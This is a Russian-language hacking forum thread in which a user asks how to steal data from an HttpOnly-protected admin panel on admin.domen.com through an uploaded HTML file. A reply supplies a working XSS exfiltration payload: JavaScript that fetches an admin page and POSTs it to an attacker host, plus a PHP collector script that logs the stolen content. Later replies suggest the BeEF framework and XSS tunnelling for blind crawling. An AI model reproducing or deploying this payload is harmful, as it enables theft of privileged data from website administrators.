Старый 10.11.2016, 22:42   #1
Марк Эльва
 
Регистрация: 28.12.2015
Сообщений: 6
Репутация: -1
По умолчанию HTML на сервере + HTTP_Only

Приветствую.
Ситуация следующая.
Сервер с SSL и http_only.
Админ панель располагается на admin.domen.com
Файл загружается на https://admin.domen.com/papka/files/file.html


Какие действия можно предпринять, чтобы получить данные из админки?
Есть какой-нибудь скрипт для передачи кода страницы или скриншота, с помощью js.
Дайте информации. Спасибо.
Марк Эльва вне форума   Ответить с цитированием
Старый 11.11.2016, 01:29   #2
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Можно поразбираться с http://beefproject.com/.

Если мероприятие разовое или любишь велостроение, то можно вот так:

PHP код:
<html>
<
script>
   var 
xhr = new XMLHttpRequest();
   
xhr.open('GET''https://admin.domen.com/secret_page.html'true);
   
xhr.send(null);
   
xhr.onreadystatechange = function() {
  if (
xhr.readyState == 4) {
  if(
xhr.status == 200) {
           var 
fhr = new XMLHttpRequest();
           
fhr.open('POST''http://your-domain.com/s.php'true);
           
fhr.setRequestHeader('Content-Type''application/x-www-form-urlencoded');
           
fhr.withCredentials true;
           var 
body 'file=' escape(xhr.responseText);
           var 
aBody = new Uint8Array(body.length);
           for (var 
0aBody.lengthi++)
             
aBody[i] = body.charCodeAt(i);
           
fhr.send(new Blob([aBody]));
  }
  }
}
</script>
</html> 
s.php:
PHP код:
<?php
header
('Access-Control-Allow-Origin: https://admin.domen.com');
header('Access-Control-Allow-Credentials: true');
header('Access-Control-Allow-Methods: OPTIONS, GET, POST');
header('Access-Control-Allow-Headers: Content-Type, Depth, User-Agent, X-File-Size, X-Requested-With, If-Modified-Since, X-File-Name, Cache-Control');
 
file_put_contents('./log.html'urldecode($_POST['file'])."<hr>"FILE_APPEND);
?>
crlf вне форума   Ответить с цитированием
Старый 11.11.2016, 12:15   #3
Марк Эльва
 
Регистрация: 28.12.2015
Сообщений: 6
Репутация: -1
По умолчанию

Точная страница в админке не известна, ( /secret_page.html ), т.е куда тноведет редирект в админке после авторизации.
На / или другую страницу, можно обыграть в скрипте автоматический редирект? Задать домен - https://admin.domen.com, чтоб само сработало.
Спасибо за скрипт!
Марк Эльва вне форума   Ответить с цитированием
Старый 11.11.2016, 16:12   #4
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Действуя вслепую, скажем парся каждый линк DOM дерева и отправляя себе на хост, есть риск что-то сломать на системе (/action?do=delete_all_databases). Так же, возможно, придётся повозиться с CSRF токенами и т.п. приблудами.

В этом случае лучше изучить тему XSS туннелей. Биф должен уметь такое.
crlf вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot